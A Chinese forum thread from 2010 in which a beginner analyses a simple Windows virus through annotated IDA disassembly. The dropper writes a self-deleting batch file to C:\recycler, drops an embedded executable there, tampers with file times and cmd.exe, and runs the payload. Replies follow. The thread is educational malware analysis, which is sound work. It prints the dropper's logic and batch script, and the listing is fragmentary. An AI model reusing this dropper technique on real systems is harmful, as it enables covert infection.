[LCG]某简单病毒的分析
本帖最后由 huzhao23 于 2010-2-20 14:53 编辑text:004017C1 push ebp ; winmian 函数的入口
.text:004017C2 mov ebp, esp
.text:004017C4 sub esp, 0B1Ch
.text:004017CA push ebx
.text:004017CB push esi
.text:004017CC push edi
.text:004017CD push 40h
.text:004017CF xor ebx, ebx
.text:004017D1 pop ecx
.text:004017D2 xor eax, eax
.text:004017D4 lea edi,
.text:004017DA mov , bl
.text:004017E0 push offset Source ; "%SystemRoot%\\system32\\calc.exe"
.text:004017E5 rep stosd
.text:004017E7 stosw ; 这里是字符串操作
.text:004017E9 stosb ; 这里也是字符串操作
.text:004017EA lea eax,
.text:004017F0 push eax ; Dest
.text:004017F1 call strcpy
.text:004017F1
.text:004017F6 pop ecx
.text:004017F7 mov esi, 104h
.text:004017F7
.text:004017FC
.text:004017FC loc_4017FC: ;
.text:004017FC pop ecx
.text:004017FD lea eax,
.text:00401803 push esi ; cchString
.text:00401804 push eax ; szString
.text:00401805 call DoEnvironmentSubstA
.text:00401805
.text:0040180B lea eax,
.text:00401811 push eax ; pszPath
.text:00401812 call PathFileExistsA
.text:00401812
.text:00401818 test eax, eax
.text:0040181A jz loc_4018ED
.text:0040181A
.text:00401820
.text:00401820 loc_401820: ;
.text:00401820 push offset LibFileName ; "Kernel32.dll"
.text:00401825 call LoadLibraryA
.text:00401825
.text:0040182B mov edi, eax
.text:0040182D push offset s->Getmodulefilenamea ; "GetModuleFileNameA"
.text:00401832 push edi ; hModule
.text:00401833 call GetProcAddress
.text:00401833
.text:00401839 lea ecx,
.text:0040183F push esi
.text:00401840 push ecx
.text:00401841 push ebx
.text:00401842 call eax
.text:00401842
.text:00401844 push edi ; hObject
.text:00401845 call CloseHandle
.text:00401845
.text:0040184B lea eax,
.text:00401851 push eax ; lpBuffer
.text:00401852 push esi ; nBufferLength
.text:00401853 call GetTempPathA ; 获取临时文件存放的路径
.text:00401853
.text:00401859 lea eax,
.text:00401859
.text:0040185C
.text:0040185C loc_40185C: ;
.text:0040185C push eax ; lpSystemTime
.text:0040185D call GetLocalTime ; 获取系统当前的时间
.text:0040185D
.text:00401863 mov edi, 400h
.text:00401863
.text:00401868
.text:00401868 loc_401868: ;
.text:00401868 lea eax,
.text:0040186E push edi ; Size
.text:0040186F push ebx ; Val
.text:00401870 push eax ; Dst
.text:00401871 call memset ; 设置内存属性
.text:00401871
.text:00401876 movzx eax, ; 系统时间的天数
.text:0040187A push eax
.text:0040187B mov esi, __imp_sprintf
.text:00401881 movzx eax, ; 系统时间的月数
.text:00401885 push eax
.text:00401886 push 83Eh ; 83EH 是年份,具体是2110 年
.text:0040188B lea eax,
.text:00401891 push offset s->D-D-D ; "%d-%d-%d"
.text:00401896 push eax ; Dest
.text:00401897 call esi ; __imp_sprintf
.text:00401897
.text:00401899 push edi ; Size
.text:0040189A lea eax,
.text:004018A0 push ebx ; Val
.text:004018A1 push eax ; Dst
.text:004018A2 call memset
.text:004018A2
.text:004018A7 lea eax, ; 把得到的2110-月份-天数 给EAX
.text:004018AD push eax
.text:004018AE lea eax, ; 把存放时间的地址给EAX
.text:004018B4 push offset s->CmdCDateS ; 把命令行下拷贝时间 "cmd /cdate %s " 字符串压栈
.text:004018B9 push eax ; Dest
.text:004018BA call esi ; __imp_sprintf ; 把字符串连接起来ASCII "cmd /cdate 2110-1-10 "
.text:004018BA ;
.text:004018BA ;
.text:004018BA
.text:004018BC lea eax, ; 存放的是临时文件的目录路径
.text:004018C2 push eax
.text:004018C3 lea eax, ; 把临时文件目录路径字符串的地址给EAX
.text:004018C9 push eax
.text:004018CA call sub_401698 ; F7,设置 C:\Recycled" 目录的访问权限,创建c:\recycler\recylna.bat"文件,在文件里写入一些命令
.text:004018CF add esp, 40h
.text:004018D2 push offset s->Te ; "TE"
.text:004018D7 push 68h
.text:004018D9 push ebx
.text:004018DA call sub_401250 ; F7 ,关键call
.text:004018DA
.text:004018DF add esp, 0Ch
.text:004018E2 push 1F40h ; dwMilliseconds
.text:004018E7 call Sleep
.text:004018E7
.text:004018ED
.text:004018ED loc_4018ED: ;
.text:004018ED pop edi
.text:004018EE pop esi
.text:004018EF pop ebx
.text:004018F0 leave
.text:004018F1 retn 10h
进入下面这个call
.text:004018CA call sub_401698
这个call的作用就是
在c:\recycler\recylna.bat 文件中写入如下代码:
:Next
del "C:\Documents and Settings\Administrator\桌面\病毒\zhangsong.exe"
if exist "C:\Documents and Settings\Administrator\桌面\病毒\zhangsong.exe" goto Next
del "c:\recycler\recylna.bat"
进入 关键 call
.text:004018DA call sub_401250 ; F7 ,关键call
关键代码如下:
.text:004012A8 sub_4012A8 proc near ;
.text:004012A8 and byte ptr , 0
.text:004012AC push 6
.text:004012AE mov , eax
.text:004012B1 pop ecx
.text:004012B2 xor eax, eax
.text:004012B4 lea edi,
.text:004012B7 rep stosd
.text:004012B9 push eax
.text:004012BA lea eax,
.text:004012BD push eax
.text:004012BE mov dword ptr , 525C3A43h
.text:004012C5 mov dword ptr , 63796365h
.text:004012CC mov dword ptr , 64656Ch
.text:004012D3 call _access ; 设置"C:\Recycled" 访问权限为可读
.text:004012D3
.text:004012D9 pop ecx
.text:00401322 loc_401322: ;
.text:00401322 push eax
.text:00401323 lea eax,
.text:00401329 push offset s->SDcnna_exe ; "%s\\%dcnna.exe"
.text:0040132E push eax ; LPSTR
.text:0040132F call wsprintfA
.text:0040132F
.text:00401335 add esp, 10h
.text:00401338 push offset LibFileName ; "Kernel32.dll"
.text:0040133D call ebx ; LoadLibraryA
.text:0040133D
.text:0040133F mov ebx, GetProcAddress
.text:00401345 push offset ProcName ; "FindResourceA"
.text:0040134A push eax ; hModule
.text:0040134B mov , eax
.text:0040134E call ebx ; GetProcAddress
.text:0040134E
.text:00401350 movzx ecx, word ptr
.text:00401354 push dword ptr
.text:00401357 push ecx
.text:00401358 push dword ptr
.text:0040135B call eax ; 调用FindResourceA 获取资源
.text:0040135B
.text:0040135D xor edi, edi
.text:0040135F mov , eax
.text:00401362 cmp eax, edi
.text:00401364 jz short loc_40139B
.text:00401364
.text:00401366 push eax ; hResInfo
.text:00401367 push dword ptr ; hModule
.text:0040136A call LoadResource ; 加载 原始文件释放的资源
.text:0040136A
.text:00401370 cmp eax, edi
.text:00401372 mov , eax
.text:00401375 jz short loc_40139B
.text:00401375
.text:00401377 push edi
.text:00401378 push 80h
.text:0040137D push 2
.text:0040137F push edi
.text:00401380 push 2
.text:00401382 lea eax,
.text:00401388 sub_401388 proc near ;
.text:00401388 ; .rsrc:00404D2D
.text:00401388 push 40000000h ; dwDesiredAccess
.text:0040138D push eax ; lpFileName
.text:0040138E call CreateFileA ; 创建文件(ASCII "c:\recycler\8851062cnna.exe")
.text:0040138E
.text:00401394 cmp eax, edi
.text:00401396 mov , eax
.text:00401399 jnz short loc_4013A2
.text:00401399
.text:0040139B
.text:0040139B loc_40139B: ;
.text:0040139B ;
.text:0040139B xor eax, eax
.text:0040139D jmp loc_401693
.text:0040139D
.text:004013A2 ; ---------------------------------------------------------------------------
.text:004013A2
.text:004013A2 loc_4013A2: ;
.text:004013A2 push 10h ; Size
.text:004013A4 lea eax,
.text:004013A7 push edi ; Val
.text:004013A8 push eax ; Dst
.text:004013A9 call memset ; 再次设置C:\Recycled 目录的系统属性
.text:004013A9
.text:004013AE add esp, 0Ch
.text:004013B1 mov word ptr , 7BEh
.text:004013B7 mov word ptr , 5
.text:004013BD mov word ptr , 16h
.text:004013C3 push offset s->Systemtimetofiletime ; "SystemTimeToFileTime"
.text:004013C8 mov word ptr , 14h
.text:004013CE push dword ptr ; hModule
.text:004013D1 mov , di
.text:004013D5 call ebx ; GetProcAddress
.text:004013D5
.text:004013D7 lea ecx,
.text:004013DA push ecx
.text:004013DB lea ecx,
.text:004013DE push ecx
.text:004013DF call eax ; 调用SystemTimeToFileTime函数,将系统时间转换为文件时间
.text:004013DF
.text:004013E1 push dword ptr ; hLibModule
.text:004013E4 call FreeLibrary
.text:004013E4
.text:004013EA lea eax,
.text:004013ED push eax ; lpFileTime
.text:004013EE lea eax,
.text:004013F1 push eax ; lpLocalFileTime
.text:004013F2 call LocalFileTimeToFileTime ; 将文件时间看成为当地时间并转换为文件时间
.text:004013F2
.text:004013F8 lea eax,
.text:004013FB push eax
.text:004013FC lea eax,
.text:004013FF push edi
.text:00401400 push eax
.text:00401401 push dword ptr
.text:00401401
.text:00401401 sub_401388 endp ; sp-analysis failed
.text:00401401
.text:00401404
.text:00401404 ; =============== S U B R O U T I N E =======================================
.text:00401404
.text:00401404
.text:00401404 sub_401404 proc near ; DATA XREF: sub_4041D0+49
.text:00401404 ; sub_404600+10
.text:00401404 ; .rsrc:0040489
.text:00401404 ; .rsrc:004049D2
.text:00401404 ; .rsrc:loc_404CB5
.text:00401404 call SetFileTime ; 设置系统时间
.text:00401404
.text:0040140A push offset s->Writefile ; "WriteFile"
.text:0040140F push dword ptr ; hModule
.text:00401412 call ebx ; GetProcAddress ; 获取writefile 函数地址
.text:00401412
.text:0040141F call ebx ; GetProcAddress ; 获取sizeofresource函数地址
.text:0040141F
.text:00401421 lea ecx,
.text:00401424 push edi
.text:00401425 push ecx
.text:00401426 push dword ptr
.text:00401429 push edi
.text:0040142A call eax ; 调用sizeofresource 函数
.text:0040142A
.text:0040142C push eax
.text:0040142D push dword ptr
.text:00401430 push dword ptr
.text:00401433 call dword ptr
.text:00401433
.text:00401436 push dword ptr ; hObject
.text:00401439 call CloseHandle
.text:00401439
.text:0040143F push offset s->Freeresource ; "FreeResource"
.text:00401444 push dword ptr ; hModule
.text:00401447 call ebx ; GetProcAddress
.text:00401447
.text:00401449 push dword ptr
.text:0040144C call eax ; 释放资源
.text:0040144C
.text:0040144E mov edi, fopen
.text:00401454 sub_401454 proc near ;
.text:00401454
.text:00401454 var_4 = dword ptr -4
.text:00401454
.text:00401454 lea eax, ; c:\recycler\8851062cnna.exe 指针给EAX
.text:0040145A push offset Mode ; 设置8851062cnna.exe 为可读可写属性
.text:0040145F push eax ; Filename
.text:00401460 call edi ; fopen
.text:00401460
.text:00401462 mov cx, word ptr dword_401120
.text:00401469 mov , eax
.text:0040146C push eax ; File
.text:0040146D push 1 ; Count
.text:0040146F lea eax,
.text:00401472 push 1 ; Size
.text:00401474 push eax ; Str
.text:00401475 mov , cx
.text:00401479 call fwrite
.text:00401479
.text:0040147F push dword ptr ; File
.text:00401482 call fclose
.text:00401482
.text:00401488 lea eax,
.text:0040148E push offset Mode ; Mode
.text:00401493 push eax ; Filename
.text:00401494 call edi ; fopen
.text:00401494
.text:00401496 mov , eax
.text:00401499 push esi ; Size
.text:0040149A push 0 ; Val
.text:0040149C lea eax,
.text:004014A2 push eax ; Dst
.text:004014A3 call memset
.text:004014A3
.text:004014A8 push dword ptr ; File
.text:004014AB lea eax,
.text:004014B1 push esi ; Count
.text:004014B2 push 1 ; ElementSize
.text:004014B4 push eax ; DstBuf
.text:004014B5 call fread ; 读入c:\recycler\8851062cnna.exe
.text:00401506 push 0 ; Origin
.text:00401508 push dword ptr ; Offset
.text:0040150B push dword ptr ; File
.text:0040150E call fseek ; 从8851062cnna.exe的开始来移动文件的指针到一个地址里
.text:0040150E
.text:00401514 add esp, 2Ch
.text:00401517 lea eax,
.text:0040151A push dword ptr ; File
.text:0040151D push eax ; Str
.text:0040151E call strlen ; 获取字符PE 的长度
.text:0040151E
.text:00401590 loc_401590: ;
.text:00401590 mov dword ptr , 525C3A43h
.text:00401597 mov dword ptr , 63796365h
.text:0040159E mov dword ptr , 5C64656Ch
.text:0040159E
.text:004015A5
.text:004015A5 loc_4015A5: ;
.text:004015A5 push offset s->Getsystemdirectorya ; "GetSystemDirectoryA"
.text:004015AA mov dword ptr , 79636572h
.text:004015B1 push dword ptr ; hModule
.text:004015B4 mov dword ptr , 78652E6Ch
.text:004015BB mov dword ptr , 65h
.text:004015C2 call ebx ; GetProcAddress
.text:004015C2
.text:004015C4 lea ecx,
.text:004015CA push esi
.text:004015CB push ecx
.text:004015CC call eax ; 调用GetSystemDirectoryA函数获取系统 C:\WINDOWS\system32 目录
.text:004015CC
.text:004015CE lea eax,
.text:004015D4 push eax
.text:004015D5 lea eax,
.text:004015DB push offset dword_4010F8 ; 调用CMD.EXE
.text:004015E0 push eax ; Dest
.text:004015E1 call edi ; __imp_sprintf ; 复制 "C:\WINDOWS\system32\cmd.exe"
.text:004015E1
.text:004015E3 add esp, 0Ch
.text:004015E6 push offset s->Copyfilea ; "CopyFileA"
.text:004015EB push dword ptr ; hModule
.text:004015EE call ebx ; GetProcAddress
.text:004015EE
.text:004015F0 lea ecx,
.text:004015F3 push 0
.text:004015F5 push ecx
.text:004015F6 lea ecx,
.text:004015FC push ecx
.text:004015FD call eax ; 把 "c:\recycler\recyl.exe"文件重命名为C:\WINDOWS\system32\cmd.exe"
.text:004015FD
.text:004015FF push esi
.text:00401614 sub_401614 proc near ;
.text:00401614 push eax
.text:00401615 lea eax,
.text:0040161B push offset dword_4010E0 ; Format
.text:00401620 push eax ; Dest
.text:00401621 call edi ; __imp_sprintf ; 得到"cmd /cc:\recycler\8851062cnna.exe "字符串
.text:00401621
.text:00401623 add esp, 18h
.text:00401626 xor eax, eax
.text:00401628 lea edi,
.text:0040162E xor esi, esi
.text:00401630 push 10h
.text:00401632 pop ecx
.text:00401633 push offset s->Createprocessa ; "CreateProcessA"
.text:00401668 sub_401668 proc near ;
.text:00401668 lea ecx,
.text:0040166E push ecx
.text:0040166F push esi
.text:00401670 push esi
.text:00401671 push 8000020h
.text:00401676 push 1
.text:00401678 push esi
.text:00401679 lea ecx,
.text:0040167F push esi
.text:00401680 push ecx
.text:00401681 lea ecx,
.text:00401684 push ecx
.text:00401685 call eax ; 创建一个进程,并且以ASCII "c:\recycler\recyl.exe"中的recyl.exe 作为进程信息
.text:00401685
.text:00401687 push dword ptr ; hLibModule
.text:0040168A call FreeLibrary
.text:0040168A
.text:00401690 push 1
.text:00401692 pop eax
分析就这么多,初次分析这样的东西,可能分析的不是很全面,讲解说明上可能不是很得当,请各位大侠指教哈。。。
病毒样本:
RECYCLER 里释放的文件: 呵呵 分析的不错哦 我的好好学习一下咯 用ResHacker提取一下,修复下PE头,再提取,再修复,得出两个exe和一个Dll 看过顶一下 回复 3# smallyou93
看来版主分析过这个 看过顶一下
页:
[1]